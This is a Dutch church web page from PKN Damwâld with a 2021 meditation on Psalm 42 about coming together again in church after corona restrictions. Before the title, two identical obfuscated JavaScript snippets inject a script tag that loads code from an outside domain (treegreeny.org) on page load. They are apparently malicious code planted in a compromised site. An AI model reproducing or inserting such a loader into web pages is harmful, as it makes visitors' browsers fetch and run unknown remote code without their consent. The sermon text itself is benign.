;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Weer samen komen? - PKN Damwâld

Weer samen komen?

Gepubliceerd op: vrijdag 9 juli 2021

Veel corona maatregelen zijn voorbij en we kunnen weer naar de kerk. Maar de vraag is of de behoefte er nog wel is. Je kan toch ook thuis meeluisteren? Heeft het een meerwaarde om samen te komen?

In Psalm 42 schrijft de dichter hoe hij verlangt naar de nabijheid van God, zoals een hert dat verlangt naar water. Het gaat niet goed met hem en hij voelt de stekende vraag die anderen hem stellen: Waar is je God? Dan denkt hij er aan hoe goed het was om samen te komen – samen te vieren en te zingen in Gods huis. Met die gedachte bemoedigt hij zichzelf: “Wat ben je bedroefd, mijn ziel, en onrustig in mij. Vestig je hoop op God, eens zal ik hem weer loven, mijn God die mij ziet en redt” (Ps.42,6).

Samen komen in Gods huis is goed – samen Hem te loven en Zijn zegen te ontvangen en Zijn woorden te ontvangen in het krachtenveld van Gods Geest.

Het heeft een meerwaarde om samen te komen, omdat het ons versterkt voor de momenten dat het tegen zit en/of de vraag speelt: Waar is God. We staan niet alleen op de weg van het geloof en dan is het goed om samen te komen en hem te loven de God van mijn jubelende vreugde… mijn Verlosser en mijn God (Psalm 43,4.5).

Ds. G.J. Otter